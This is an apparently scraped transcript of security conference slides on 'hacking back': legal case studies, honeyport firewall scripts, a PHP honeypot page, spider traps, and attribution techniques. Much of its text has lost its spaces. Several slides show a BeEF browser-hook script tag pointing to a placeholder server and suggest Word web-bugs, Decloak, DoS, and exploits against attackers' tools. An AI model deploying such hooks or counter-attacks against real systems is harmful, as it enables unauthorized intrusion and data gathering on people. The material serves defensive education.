paul asadoorian - bringing sexy back
DESCRIPTION
TRANSCRIPT
![Page 1: Paul Asadoorian - Bringing Sexy Back](https://reader034.vdocuments.mx/reader034/viewer/2022051323/549bf8b4b47959c4318b45e1/html5/thumbnails/1.jpg)
Bringing Sexy Back:Defensive Measures That Actually Work
Paul Asadoorian ([email protected])
John Strand ([email protected]) http://pauldotcom.com
![Page 2: Paul Asadoorian - Bringing Sexy Back](https://reader034.vdocuments.mx/reader034/viewer/2022051323/549bf8b4b47959c4318b45e1/html5/thumbnails/2.jpg)
Paul Asadoorian
2
![Page 3: Paul Asadoorian - Bringing Sexy Back](https://reader034.vdocuments.mx/reader034/viewer/2022051323/549bf8b4b47959c4318b45e1/html5/thumbnails/3.jpg)
3
![Page 4: Paul Asadoorian - Bringing Sexy Back](https://reader034.vdocuments.mx/reader034/viewer/2022051323/549bf8b4b47959c4318b45e1/html5/thumbnails/4.jpg)
![Page 5: Paul Asadoorian - Bringing Sexy Back](https://reader034.vdocuments.mx/reader034/viewer/2022051323/549bf8b4b47959c4318b45e1/html5/thumbnails/5.jpg)
![Page 6: Paul Asadoorian - Bringing Sexy Back](https://reader034.vdocuments.mx/reader034/viewer/2022051323/549bf8b4b47959c4318b45e1/html5/thumbnails/6.jpg)
![Page 7: Paul Asadoorian - Bringing Sexy Back](https://reader034.vdocuments.mx/reader034/viewer/2022051323/549bf8b4b47959c4318b45e1/html5/thumbnails/7.jpg)
![Page 8: Paul Asadoorian - Bringing Sexy Back](https://reader034.vdocuments.mx/reader034/viewer/2022051323/549bf8b4b47959c4318b45e1/html5/thumbnails/8.jpg)
![Page 10: Paul Asadoorian - Bringing Sexy Back](https://reader034.vdocuments.mx/reader034/viewer/2022051323/549bf8b4b47959c4318b45e1/html5/thumbnails/10.jpg)
Goal: Bring Sexy Back
![Page 11: Paul Asadoorian - Bringing Sexy Back](https://reader034.vdocuments.mx/reader034/viewer/2022051323/549bf8b4b47959c4318b45e1/html5/thumbnails/11.jpg)
h"p://pauldotcom.com
Outline
• # whoami• Introduc-on‐OODA,Don’trunaway
• CaseStudies‐ReasonswhyweCANdothis
• Warningbanners‐Allowsyoutodothingsyoudisclose
• Annoyance‐Mr.Clippy,UserAgent,SpiderTraps
• A9ribu-on‐BeEF,MetasploitDecloak
• A9ack‐SET,Javapayloads,purpleASCIIart
11
![Page 12: Paul Asadoorian - Bringing Sexy Back](https://reader034.vdocuments.mx/reader034/viewer/2022051323/549bf8b4b47959c4318b45e1/html5/thumbnails/12.jpg)
Introduction
Yes, I said “Hacking Back” but don’t run away
12
![Page 13: Paul Asadoorian - Bringing Sexy Back](https://reader034.vdocuments.mx/reader034/viewer/2022051323/549bf8b4b47959c4318b45e1/html5/thumbnails/13.jpg)
h"p://pauldotcom.com
DisclaimerThe contents of this presentation may get you into trouble. In fact, conventional wisdom stipulates that everything we are going to discuss is a “bad idea.” Make sure you vet any tactics in this presentation by your legal team and upper management first.
Any action you take from this presentation should be documented in writing before implementing.
13
![Page 14: Paul Asadoorian - Bringing Sexy Back](https://reader034.vdocuments.mx/reader034/viewer/2022051323/549bf8b4b47959c4318b45e1/html5/thumbnails/14.jpg)
First off, why are we talking about “hacking back”?
14
![Page 15: Paul Asadoorian - Bringing Sexy Back](https://reader034.vdocuments.mx/reader034/viewer/2022051323/549bf8b4b47959c4318b45e1/html5/thumbnails/15.jpg)
h"p://pauldotcom.com
SuccessfulPenetra-onTests
• MostorganizaOonsprovideeasyaccesstotheir“intellectualproperty”• Howmanypentestshaveyoubeenon?
• Howmanyofthoseweresuccessful?
• Or?• Howmanywomenhaveyoudated?
• Howmanyhaveyousleptwith?
15
![Page 16: Paul Asadoorian - Bringing Sexy Back](https://reader034.vdocuments.mx/reader034/viewer/2022051323/549bf8b4b47959c4318b45e1/html5/thumbnails/16.jpg)
Why Are Penetration Tests Always So Successful?
16
![Page 17: Paul Asadoorian - Bringing Sexy Back](https://reader034.vdocuments.mx/reader034/viewer/2022051323/549bf8b4b47959c4318b45e1/html5/thumbnails/17.jpg)
h"p://pauldotcom.com
1.FlimsyDefensive“Layers”
17
![Page 18: Paul Asadoorian - Bringing Sexy Back](https://reader034.vdocuments.mx/reader034/viewer/2022051323/549bf8b4b47959c4318b45e1/html5/thumbnails/18.jpg)
h"p://pauldotcom.com
2.SocialEngineering
18
Because there is no patch for human stupidity...
![Page 21: Paul Asadoorian - Bringing Sexy Back](https://reader034.vdocuments.mx/reader034/viewer/2022051323/549bf8b4b47959c4318b45e1/html5/thumbnails/21.jpg)
h"p://pauldotcom.com
John&PaulThenThought
• Wecandobe"er
• Whatifweweretodefendsystems,applyingwhatweknowabouta"acks?
• Forsolongwe’vegonedownthebeatenpaththatwecall“security”
• ItsOmetobreakthemold
21
Wealsothoughtabouthowmessywegetwhenea-ngnoodles,butsomeonebeatustothesolu-on...
![Page 22: Paul Asadoorian - Bringing Sexy Back](https://reader034.vdocuments.mx/reader034/viewer/2022051323/549bf8b4b47959c4318b45e1/html5/thumbnails/22.jpg)
h"p://pauldotcom.com
WhyUseOffensiveCounterMeasures?
• ThereareOmeswhereyouwillberequiredtodo“more”• InparOcularwhenworkingwithlawenforcement
• Thea"ackersarege^ngmoreandmorebrazen• Veryli"leperceivedriskontheirpart
• Wehaverules,theydon’tfollowrules
• Youmayneedtofigureoutwhatana"ackerisaberorgatherinformaOonaboutthem• e.g.Iftheyarea"ackingfromabot‐netorthroughTOR
22
![Page 23: Paul Asadoorian - Bringing Sexy Back](https://reader034.vdocuments.mx/reader034/viewer/2022051323/549bf8b4b47959c4318b45e1/html5/thumbnails/23.jpg)
h"p://pauldotcom.com
OODA
• Whomevercandothesethingsthefastestlives:• Observe
• Orient
• Decide
• Act
• Originallydevelopedforfighter‐pilots
• Withcurrentsecuritymodelshowmanycanyouimpact?
• Worksbothways,Dis‐Orienta"ackers!
23
JohnBoyd
Paul,“figh-ng”
![Page 24: Paul Asadoorian - Bringing Sexy Back](https://reader034.vdocuments.mx/reader034/viewer/2022051323/549bf8b4b47959c4318b45e1/html5/thumbnails/24.jpg)
Case Studies
Stuff other people did that makes what we’re going to do look okay
24
![Page 25: Paul Asadoorian - Bringing Sexy Back](https://reader034.vdocuments.mx/reader034/viewer/2022051323/549bf8b4b47959c4318b45e1/html5/thumbnails/25.jpg)
h"p://pauldotcom.com
CaseStudy:ConsenttoUniversityNetworkTerms
• Sysadminhacksintothreateningmachine• Gatheredevidenceusedagainststudentusingtemp/tempcreds
• Student’sconsenttouniversitytermsjusOfiessysadmin
• U.S.v.Heckenkamp
• KevinPoulsen,“CourtOkaysCounter‐HackofeBayHacker'sComputer,”ThreatLevel,April6,2007,• h"p://blog.wired.com/27bstroke6/2007/04/court_okays_cou.html
25
“A federal appeals court just shot down an a4empt by confessed superhacker Jerome Heckenkamp to overturn his computer crime convic=ons, which were an end result of informa=on provided by a university sysadmin who broke into Heckenkamp’s computer to gather evidence.”
![Page 26: Paul Asadoorian - Bringing Sexy Back](https://reader034.vdocuments.mx/reader034/viewer/2022051323/549bf8b4b47959c4318b45e1/html5/thumbnails/26.jpg)
h"p://pauldotcom.com
CaseStudy:PublicExampleofReflectedA9ack
• 1999‐WorldTradeOrganizaOonwebsite
• DOSa"ackfromE‐HippiesCoaliOon
• HosOngserviceConxionreflectedthea"ackbacktoE‐Hippiesanddisableditswebsite
• Conxionnotprosecuted• h"p://www.networkworld.com/research/2000/0529feat2.html
26
"So we told our filtering soFware to redirect any packets coming from these machines back at the e‐hippies Web server"
![Page 27: Paul Asadoorian - Bringing Sexy Back](https://reader034.vdocuments.mx/reader034/viewer/2022051323/549bf8b4b47959c4318b45e1/html5/thumbnails/27.jpg)
h"p://pauldotcom.com
CaseStudy:MSFTCourtOrder–Botnet
• Civillawsuit2010
• CourtissuesordertosuspendthedomainsassociatedwiththeWaledacbotnet
• MSFTtakes“othertechnicalmeasures”todegradethebotnet• www.google.com/buzz/benwright214/PcJTmLbEwit/Cyber‐Defense‐Law‐Botnet‐Computer‐Crime‐Lawsuit
27
“No=ce that MicrosoF is not doing this in the dark. It is working through our open public court system, so that MicrosoF is transparent and accountable and all can see what is happening and evaluate it.”
![Page 28: Paul Asadoorian - Bringing Sexy Back](https://reader034.vdocuments.mx/reader034/viewer/2022051323/549bf8b4b47959c4318b45e1/html5/thumbnails/28.jpg)
h"p://pauldotcom.com
CaseStudy:DOJTakesOver2MillionNodeBotnet
• AjudgegavepermissiontoFBIandU.S.MarshalstosetupserverstostoptheCorefloodbotnet
• Theywerealsogivenpermissionto“tosendcommandstoinfectedcomputersthatstopstheCorefloodvirus”
• Theyseized5serversand29domainnames
• DOJnowowns2.5millioncomputersontheInternet,andwillessenOallytellthemalwaretoself‐destruct
• What,thisisn’tsexyenoughforyou?
28
![Page 29: Paul Asadoorian - Bringing Sexy Back](https://reader034.vdocuments.mx/reader034/viewer/2022051323/549bf8b4b47959c4318b45e1/html5/thumbnails/29.jpg)
h"p://pauldotcom.com
LetsPretendI’maLawyer
• I’madvisingyouto:• Discuss
• Document
• Plan
• Consultwithothers,revealyourplans!
• HidingintenOonsmeansyouthinkwhatyouaredoingis"wrong”
• Ruleofthumb:Don’tbeevil• Whileitcanseemlikealotoffun,itcangetyouinbigtrouble
29
Note:WelovetheEFF(eff.orggodonate!)
![Page 30: Paul Asadoorian - Bringing Sexy Back](https://reader034.vdocuments.mx/reader034/viewer/2022051323/549bf8b4b47959c4318b45e1/html5/thumbnails/30.jpg)
h"p://pauldotcom.com
Okay,LetsStopPretending
• Couldthisgetyouintotrouble?• Possibly.Thereiss-llsomedebateonhowtodoitproperly
• Thereareafewthingswecanavoidtokeepusfromge^ngintrouble• Don’teverputmalwarewhereitispubliclyaccessible
• Don’tmakeittoeasytogetto
• UseWarningBanners...
30
![Page 31: Paul Asadoorian - Bringing Sexy Back](https://reader034.vdocuments.mx/reader034/viewer/2022051323/549bf8b4b47959c4318b45e1/html5/thumbnails/31.jpg)
Warning Banners
Warning, we are going to talk about warning banners...
31
![Page 32: Paul Asadoorian - Bringing Sexy Back](https://reader034.vdocuments.mx/reader034/viewer/2022051323/549bf8b4b47959c4318b45e1/html5/thumbnails/32.jpg)
h"p://pauldotcom.com
LookatYourWarningBanner
• Thereisalotinthereaboutpermission
• Thereareanumberoftechnologiesthatwill“check”yoursystembeforeitaccessesthenetwork• OpenVPNscripts(LikeaNACCheck)
• Windows2008NetworkAccessProtecOon
• IsitpossibletousethisasameanstogathersomeinformaOonaboutana"ackersystem?
• Putinyourwarningbannerthatyoucandowhatyouwant!
32
![Page 33: Paul Asadoorian - Bringing Sexy Back](https://reader034.vdocuments.mx/reader034/viewer/2022051323/549bf8b4b47959c4318b45e1/html5/thumbnails/33.jpg)
h"p://pauldotcom.com
Example:EricNeededaWarningBanner
• Whatdoesakitchenknife,acrutch,andductapehavetodowithanything?
• Itisillegaltosetuplethaltrapsfortrespassers
• However,ifyoutellthemtheremaybeevilthingsonyournetwork/propertyyouwarnedthem
33
"superwenttoopenthedoor,feltresistanceandfoundtherigged contrap-on"‐‐ a big knife duct‐taped to a crutch,whichwasinstalledwithanelas-ccord.Thesuperwasnotinjured.
Eric Stetz was arrested and charged with recklessendangermentforavicious‐lookingboobytrap.
h"p://gothamist.com/2008/04/06/homemade_booby.php
![Page 34: Paul Asadoorian - Bringing Sexy Back](https://reader034.vdocuments.mx/reader034/viewer/2022051323/549bf8b4b47959c4318b45e1/html5/thumbnails/34.jpg)
WARNING: There is a knife duct taped to a crutch attached to an elastic band. Enter at your own
risk!
Would this have kept Eric Stetz out of trouble?
![Page 35: Paul Asadoorian - Bringing Sexy Back](https://reader034.vdocuments.mx/reader034/viewer/2022051323/549bf8b4b47959c4318b45e1/html5/thumbnails/35.jpg)
FREE VASECTOMY
This likely would not have kept Eric Stetz out of trouble...
![Page 36: Paul Asadoorian - Bringing Sexy Back](https://reader034.vdocuments.mx/reader034/viewer/2022051323/549bf8b4b47959c4318b45e1/html5/thumbnails/36.jpg)
h"p://pauldotcom.com
RealityCheck:Don’tBeStupid(likeEric)
• Howcouldthisgowrongforyou?• Dumbmoves(likeknifecrutches)
• Easilyaccessiblemalware(e.g.traps)
• Fulla"acksofa"ackerIPaddresses
• Purposelydamagingsystems
• Persistentlong‐termaccesstobadguys
• WehavesmarteropOonstoworkwith1. Annoyance
2. A9ribu-on
3. A9ack
36
![Page 37: Paul Asadoorian - Bringing Sexy Back](https://reader034.vdocuments.mx/reader034/viewer/2022051323/549bf8b4b47959c4318b45e1/html5/thumbnails/37.jpg)
Annoyance
Stressing out the attackers...37
![Page 38: Paul Asadoorian - Bringing Sexy Back](https://reader034.vdocuments.mx/reader034/viewer/2022051323/549bf8b4b47959c4318b45e1/html5/thumbnails/38.jpg)
h"p://pauldotcom.com
Annoyance:HoneyPorts
• Forcesa"ackerstomakeafullconnecOontoavoidspoofingpiralls
• A"ackersandtestershatethis……..
38
@echo offfor /L %%i in (1,1,1) do @for /f "tokens=3" %%j in ('netstat -nao ^| find ^":3333^"') do@for /f "tokens=1 delims=:" %%k in ("%%j") do netsh advfirewall firewall add rulename="WTF" dir=in remoteip=%%k localport=any protocol=TCP action=block
IfamachinemakesafullTCPconne-ontoport3333,afirewallruleisaddedtoblockthesourceIPaddress
![Page 39: Paul Asadoorian - Bringing Sexy Back](https://reader034.vdocuments.mx/reader034/viewer/2022051323/549bf8b4b47959c4318b45e1/html5/thumbnails/39.jpg)
h"p://pauldotcom.com
Annoyance:HoneyPorts
• WorksonLinuxtooofcourse,sameconcept
• MusthaveworkingcopyofNetcatonyoursystem
• ShouldbemodifiedtologenOresandreportbacktoenterpriseSIEM
39
[root@linux ~]# while [ 1 ] ; echo "started" ; do IP=`nc -v -l -p 2222 2>&1 1> /dev/null | grep from | cut -d[ -f 3 | cut -d] -f 1`; iptables -A INPUT -p tcp -s ${IP} -j DROP ; done
![Page 40: Paul Asadoorian - Bringing Sexy Back](https://reader034.vdocuments.mx/reader034/viewer/2022051323/549bf8b4b47959c4318b45e1/html5/thumbnails/40.jpg)
h"p://pauldotcom.com
Annoyance:Mr.Clippy
• ThroughPHPIDSwecanmakea"ackingawebsite“interesOng”
• First,installPHPIDS
• PHPIDShasclippingthreshholds
• Thencreatearuletoalla"ackerstopullupMr.Clippy
40
![Page 41: Paul Asadoorian - Bringing Sexy Back](https://reader034.vdocuments.mx/reader034/viewer/2022051323/549bf8b4b47959c4318b45e1/html5/thumbnails/41.jpg)
h"p://pauldotcom.com
Annoyance:MakingYourWebsiteLookLikeSomethingElse
41
Oh,yourIIS,hereareallmyIISa9acks!
![Page 42: Paul Asadoorian - Bringing Sexy Back](https://reader034.vdocuments.mx/reader034/viewer/2022051323/549bf8b4b47959c4318b45e1/html5/thumbnails/42.jpg)
h"p://pauldotcom.com
Annoyance:FilterUser‐AgentStrings
• FiltertheUser‐Agentsinusebya"ackersandtesters:• Nikto,AcuneOx,“IamHackingYou”
• Sitesdonotlockdownthemobileversionofwebsite• TherehasbeenalotofresearchinthisareabyChrisJohnRiley
• E.gUsingtheiPhoneUser‐Agentrevelsmobileversionofsite
• Somepeopledon’tsecurethemobileversion
• WhatifyoupresenttrapsorDoScondiOonsbasedonUser‐Agent?
42
![Page 43: Paul Asadoorian - Bringing Sexy Back](https://reader034.vdocuments.mx/reader034/viewer/2022051323/549bf8b4b47959c4318b45e1/html5/thumbnails/43.jpg)
h"p://pauldotcom.com 43
<?php
$ip = getenv(REMOTE_ADDR);$useragent = getenv(HTTP_USER_AGENT);
$to = "[email protected]";$subject = "Robots honeypot from " . $ip;$body = "User at " . $ip . " tripped robots honeypot.\nUser-Agent was: " . $useragent;
mail($to, $subject, $body);
echo("<html><h1>Congratulations, you found the secret page. Now email " . $to . " to avoid being blacklisted.</h1></html>");
echo("Your IP address is: " . $ip . "\n");
echo("Your User Agent is: " . $useragent . "\n");
?>
Annoyance:MessingwithA9ackersHeads
CreditJoshWright:h9p://mail.pauldotcom.com/pipermail/pauldotcom/2009‐February/000713.html
![Page 44: Paul Asadoorian - Bringing Sexy Back](https://reader034.vdocuments.mx/reader034/viewer/2022051323/549bf8b4b47959c4318b45e1/html5/thumbnails/44.jpg)
h"p://pauldotcom.com
Annoyance:MessingwithA9ackersHeads
44
Thisallhappenedinthesameday!
Funpartiswegettomakethingsupastowhythishappened...
![Page 45: Paul Asadoorian - Bringing Sexy Back](https://reader034.vdocuments.mx/reader034/viewer/2022051323/549bf8b4b47959c4318b45e1/html5/thumbnails/45.jpg)
h"p://pauldotcom.com
Annoyance:EvilWebServers
• Manytestersanda"ackersuseautomatedcrawling• ThishelpsidenOfypagesandpossibleinserOonpointsfortheira"acks
• Iftheysaytheydon’t,theyareprobablylying
• *Maybe*thereisawaytoa"ackthetools• Se^ngupaDoScondiOonfortheirautomatedscanner
• Note:ThisisnotsomethingyouwanttotryonanexternalwebserverthatyouwanttohavecrawledbyGoogle• Configurerobots.txttopointtoresourcesyoucontrol
• NOTsomethingyouputinyourindex.phppage!
45
![Page 46: Paul Asadoorian - Bringing Sexy Back](https://reader034.vdocuments.mx/reader034/viewer/2022051323/549bf8b4b47959c4318b45e1/html5/thumbnails/46.jpg)
h"p://pauldotcom.com
Exploi-ngExis-ngVulnerabili-es
• AccuneOxDoSinSnifferComponent• h"p://www.symantec.com/business/security_response/
a"acksignatures/detail.jsp?asid=23507
• WebinspectCrashesLoadingReports• h"p://seclists.org/educause/2009/q3/526“We can run the scans but if you
select a report that has cri=cal vulnerabili=es in it the report generator crashes with invalid characters.”
• AppScanVulnerabiliOes• SSL:h"ps://www‐304.ibm.com/support/docview.wss?uid=swg1PM24290
• LoginRecording:h"ps://www‐304.ibm.com/support/docview.wss?uid=swg1PM04998
46
![Page 47: Paul Asadoorian - Bringing Sexy Back](https://reader034.vdocuments.mx/reader034/viewer/2022051323/549bf8b4b47959c4318b45e1/html5/thumbnails/47.jpg)
h"p://pauldotcom.com
EvilAnnoyance:FuzzingA9ackerTools
• Whynotbrowsethea"ackers/testerstools?
• Thereareanumberofdifferentbrowserfuzzersavailable• Bf3,Sully,Python
• WecanalsouseDOM‐Hanoi• Gearedtowardsbrowserfuzzing,buthey.Itworks
• Actually,itjusttakesalongOmetorun
• Goal:Buildapagethatconsistantlycrashesthea9ackerstool!
47
![Page 49: Paul Asadoorian - Bringing Sexy Back](https://reader034.vdocuments.mx/reader034/viewer/2022051323/549bf8b4b47959c4318b45e1/html5/thumbnails/49.jpg)
h"p://pauldotcom.com
SpiderTrap&WebLabyrinth
• Spidertrap:SmallPythonscripttotrapwebspiders
• BenJacksoncreatedaPHPversioncalledWebLabyrinth
• ItisPHPsoyoucanloaditinyourwebinfrastructure
• Hasanumberofcoolfeatures• GentlytellsGooglebottogoaway
• RandomHTTPcodes
• *NEW*DatabaseSupport
• *NEW*AlerOngwithIDS‐stylerules
• DavidBowieApproved
49
![Page 51: Paul Asadoorian - Bringing Sexy Back](https://reader034.vdocuments.mx/reader034/viewer/2022051323/549bf8b4b47959c4318b45e1/html5/thumbnails/51.jpg)
h"p://pauldotcom.com
Keepingit“Real”
51
![Page 54: Paul Asadoorian - Bringing Sexy Back](https://reader034.vdocuments.mx/reader034/viewer/2022051323/549bf8b4b47959c4318b45e1/html5/thumbnails/54.jpg)
h"p://pauldotcom.com
ThisisGoingtoTakeaWhile...
54
Alsoannoying
![Page 55: Paul Asadoorian - Bringing Sexy Back](https://reader034.vdocuments.mx/reader034/viewer/2022051323/549bf8b4b47959c4318b45e1/html5/thumbnails/55.jpg)
h"p://pauldotcom.com
HelpstheInternetBeaBe9erPlace?
55
[17/Mar/2011:21:32:03 +0000] [209.20.92.14/sid#19367c8][rid#26616d8/initial] (1) redirect to http://securityfail.com/labyrinth/ [REDIRECT/302]
209.190.23.66 - - [17/Mar/2011:21:32:03 +0000] "GET //admin/ HTTP/1.1" 302 192 "-" "Made by ZmEu @ WhiteHat Team - www.whitehat.ro"
TheIPAddress209.20.92.14wonderedintothelabyrinth:
“/admin”onmyserverredirectspeopleorbotstothelabyrinth:
Interes-ngUserAgent,eh?
![Page 56: Paul Asadoorian - Bringing Sexy Back](https://reader034.vdocuments.mx/reader034/viewer/2022051323/549bf8b4b47959c4318b45e1/html5/thumbnails/56.jpg)
h"p://pauldotcom.com
• Turnsout“ZmEu”isapopularstringfortheuseragenttocontainforbotslookingforinsecurewebapplicaOons
• IftheautomatedbotswasteOmeinmylabyrinth,thatslessOmetheyspenda"ackingothersites
• ItsalsolessOmetheyspendonmyownsitetryinglamea"acks,thatlikelywouldnotworkanyway
• My“traps”shouldalsospringonsomeofthefollowingrequestsaswell:
56
[client209.190.23.66]Filedoesnotexist:/var/lib/mediawiki/phpmyadmin[client209.190.23.66]Filedoesnotexist:/var/lib/mediawiki/phpMyAdmin[client209.190.23.66]Filedoesnotexist:/var/lib/mediawiki/dbadmin[client209.190.23.66]Filedoesnotexist:/var/lib/mediawiki/myadmin[client209.190.23.66]Filedoesnotexist:/var/lib/mediawiki/MyAdmin
HelpstheInternetBeaBe9erPlace?
![Page 57: Paul Asadoorian - Bringing Sexy Back](https://reader034.vdocuments.mx/reader034/viewer/2022051323/549bf8b4b47959c4318b45e1/html5/thumbnails/57.jpg)
h"p://pauldotcom.com
Laughingatmeorlaughingatthem?• Nicetoseea"ackersaresmilingatme,ornot• MulOplea"emptsfromdifferentIPsacrossmulOpleservers
• About“anO‐sec”:
57
[client 68.178.200.178] File does not exist: /var/lib/mediawiki/w00tw00t.at.blackhats.romanian.anti-sec:)65.18.168.136 - - [04/Mar/2011:19:53:13 +0000] "GET /w00tw00t.at.blackhats.romanian.anti-sec:) HTTP/1.1" 404 239 "-" "ZmEu"72.167.165.90 - - [21/Feb/2011:10:56:01 +0000] "GET /w00tw00t.at.blackhats.romanian.anti-sec:) HTTP/1.1" 404 239 "-" "ZmEu"89.108.119.29 - - [06/Feb/2011:02:01:52 +0000] "GET /w00tw00t.at.blackhats.romanian.anti-sec:) HTTP/1.1" 404 239 "-" "ZmEu"
The Anti Security Movement (also written as antisec and anti-sec or antii-sec) is a popular[citation needed]movement opposed to the computer security industry. It attempts to censor the publication of information relating to but not limited to: software vulnerabilities, exploits, exploitation techniques, hacking tools, attacking public outlets and distribution points of that information.
![Page 58: Paul Asadoorian - Bringing Sexy Back](https://reader034.vdocuments.mx/reader034/viewer/2022051323/549bf8b4b47959c4318b45e1/html5/thumbnails/58.jpg)
Attribution
I can still see you...58
![Page 59: Paul Asadoorian - Bringing Sexy Back](https://reader034.vdocuments.mx/reader034/viewer/2022051323/549bf8b4b47959c4318b45e1/html5/thumbnails/59.jpg)
h"p://pauldotcom.com
Protec-ngYourIntellectualProperty
• “Callbacks”‐SimilartoSobwareupdates
• SendsinformaOonbacktohomebaseaboutsystem
• IPaddress,hardwareandsobwareconfiguraOons
• MicrosobGenuineAdvantage,crashdumps
• Trackingsobwareinphones• JustlookatAndroid...Does“checkers”reallyneedaccesstomycontactlistandcallhistory?
• Wearenotnecessarytalkingabout“hacking”perse
• Wearetalkingaboutge^nga"ribuOon
59
![Page 61: Paul Asadoorian - Bringing Sexy Back](https://reader034.vdocuments.mx/reader034/viewer/2022051323/549bf8b4b47959c4318b45e1/html5/thumbnails/61.jpg)
h"p://pauldotcom.com
WordWeb‐Bugs• FeaturebuiltintoexploitframeworksforpenetraOontesOng
• ThistacOcworksgreatattrackingintellectualproperty
• Notallwaysofa"ribuOonneedresultinshellaccess
• Farlesslikelytocrashasystem
• EmbedthiscodeinaspreadsheetcalledSSN.xlsandwatchhowfastana"ackerrunsthemacros
• Callbackshouldgotoacloselymonitoredsystem
61
ThisislikeSpyStuff,likeJamesBond...
“OhhhhhhJames...” See,DefenseISSexy!Eh?
![Page 62: Paul Asadoorian - Bringing Sexy Back](https://reader034.vdocuments.mx/reader034/viewer/2022051323/549bf8b4b47959c4318b45e1/html5/thumbnails/62.jpg)
h"p://pauldotcom.com
Howdoesitwork?
• Itsimplyinsertsareferencetoacssrunningonthesystem,inthiscase,runningCoreIMPACT
• WhenthedocisopenedittriestoopentheURL
• DirectconnecOon!
62
![Page 63: Paul Asadoorian - Bringing Sexy Back](https://reader034.vdocuments.mx/reader034/viewer/2022051323/549bf8b4b47959c4318b45e1/html5/thumbnails/63.jpg)
h"p://pauldotcom.com
WebApplica-onStreetfigh-ng
• HowcanweuseJavaScriptagainstthea"ackers?
• BeEF(BrowserExploitaOonFramework)• HarvestinformaOon
• Senddirectlinks
• Possiblyexploittheirsystems(XMLRPC)
• Maybewecouldjustmesswiththem• SendindicaOonsofXSSandSQLiineveryresponsetotheira"acks
• Weneedtohaveawidevarietyoftoolsandtechniques
63
![Page 64: Paul Asadoorian - Bringing Sexy Back](https://reader034.vdocuments.mx/reader034/viewer/2022051323/549bf8b4b47959c4318b45e1/html5/thumbnails/64.jpg)
h"p://pauldotcom.com 64
![Page 65: Paul Asadoorian - Bringing Sexy Back](https://reader034.vdocuments.mx/reader034/viewer/2022051323/549bf8b4b47959c4318b45e1/html5/thumbnails/65.jpg)
• Leadthea"ackertodecoysitethatnolegituserwouldvisit
• Example:robots.txt:
• Example:admin.phpdisplaysabogusloginpage
• Hiddeninadmin.phpis“TheHook:
• <scriptlanguage='Javascript'src="h"p://<yourserver>/beef/hook/beefmagic.js.php'></script>
h"p://pauldotcom.com
BeEF:Getthea9ackertoconnect
65
User-agent: *Disallow: /admin/admin.php
Ilikeninjagrapplinghooks....
![Page 68: Paul Asadoorian - Bringing Sexy Back](https://reader034.vdocuments.mx/reader034/viewer/2022051323/549bf8b4b47959c4318b45e1/html5/thumbnails/68.jpg)
h"p://pauldotcom.com
HookedonBeEF:Nowwhat?
• CapabiliOesarebroad• Gatherinfo
• Browsertypeandversion,OStypeandversion,screenresoluOon,etc.
• Simplepopup:
68
![Page 69: Paul Asadoorian - Bringing Sexy Back](https://reader034.vdocuments.mx/reader034/viewer/2022051323/549bf8b4b47959c4318b45e1/html5/thumbnails/69.jpg)
h"p://pauldotcom.com 69
A9ackersuseIIS6.0?NoWay!
![Page 70: Paul Asadoorian - Bringing Sexy Back](https://reader034.vdocuments.mx/reader034/viewer/2022051323/549bf8b4b47959c4318b45e1/html5/thumbnails/70.jpg)
h"p://pauldotcom.com
BeEFModules• Theissueisdecidinghowfartogo
• Doyoucrossthelinebetweeninfogatheringanda"ackingthea"acker(s)system?
• YoucandothatwithBeEF,notsayingthatyoushould,butyoucanifyouhavepermission
• Crosstheline:Manybuilt‐inmodules• MetasploitintegraOon:BrowserAutopwn,
SMBChallengeTheb,etc.
• DoSmaybeokay,andthisseemslikeagoodplacetobuildaDoSforyourfavorite,ornottofavorite,hackingtool
• Example:FindanexploitforNiktoandputitintoBeEF
70
![Page 71: Paul Asadoorian - Bringing Sexy Back](https://reader034.vdocuments.mx/reader034/viewer/2022051323/549bf8b4b47959c4318b45e1/html5/thumbnails/71.jpg)
h"p://pauldotcom.com
BeEFModules(2)
71
Whoelsehavetheyhacked?
Whoaretheyreally?Howaretheyhiding?
Sendthemtoyourcompe--on
![Page 72: Paul Asadoorian - Bringing Sexy Back](https://reader034.vdocuments.mx/reader034/viewer/2022051323/549bf8b4b47959c4318b45e1/html5/thumbnails/72.jpg)
h"p://pauldotcom.com
A9ribu-on:Decloak
• FromtheMetsploitproject• MoreinformaOonh"p://decloak.net/
• Greatplacetoredirectusersfromrobots.txt
• Manya"ackersandpenetraOontesterswilluseproxiesand/orTortohidetheirIPaddress
• DecloakcanrevealtherealIPaddressofthescanner
72
“This tool demonstrates a system for iden=fying the real IP address of a web user, regardless of proxy seOngs, using a combina=on of client‐side technologies and custom services.”
![Page 80: Paul Asadoorian - Bringing Sexy Back](https://reader034.vdocuments.mx/reader034/viewer/2022051323/549bf8b4b47959c4318b45e1/html5/thumbnails/80.jpg)
h"p://pauldotcom.com
WirelessCountermeasureExample
• Step1:SetupahiddenSSID(“private”or“guest”)
• Step2:UseacapOveportalwhenpeopleconnecttoit
• Step3:PortalloginpagecontainsBeefhookorSETexploit(useyourwarningbanner!)
• Step4:CollectinformaOonabouta"acker(dissolvableagents)
• Step5:(OPTIONAL)BanWifiMaconWIPSand/orWirelessnetwork(worksunOltheychangeit)
80
![Page 81: Paul Asadoorian - Bringing Sexy Back](https://reader034.vdocuments.mx/reader034/viewer/2022051323/549bf8b4b47959c4318b45e1/html5/thumbnails/81.jpg)
h"p://pauldotcom.com
Gotchas
• MakesureSSIDhasaccesstonothingorjustmorehoneypots
• Toughone:PreventrealusersfromconnecOngtoit
• Tougherone:Makea"ackersthinkitsarealSSID&network
• Danger:MakesureyourBEeFserverisnotajumpingoffpoint
81
Pwningyourselfisnotfun
![Page 82: Paul Asadoorian - Bringing Sexy Back](https://reader034.vdocuments.mx/reader034/viewer/2022051323/549bf8b4b47959c4318b45e1/html5/thumbnails/82.jpg)
h"p://pauldotcom.com
Wireless:MoreThoughts
• Sendwirelessdriverexploitsonthenetwork,triggeredbysomeevent• Easilywillbackfire...
• Answertoclientsprobingfornon‐producOonnetworks,sendthemtoapagethattellsthemtheyaremis‐configured(beatthea"ackerstoit)• Mayreallypissoffusers
• BluetoothCanary‐LeaveBluetoothphonewithOBEXenabled• Haveaddressbookwithnumbersthatallroutetoyou
82
![Page 83: Paul Asadoorian - Bringing Sexy Back](https://reader034.vdocuments.mx/reader034/viewer/2022051323/549bf8b4b47959c4318b45e1/html5/thumbnails/83.jpg)
Attack
Gopher is an old protocol too...83
![Page 84: Paul Asadoorian - Bringing Sexy Back](https://reader034.vdocuments.mx/reader034/viewer/2022051323/549bf8b4b47959c4318b45e1/html5/thumbnails/84.jpg)
h"p://pauldotcom.com
A9ack:JavaPayload
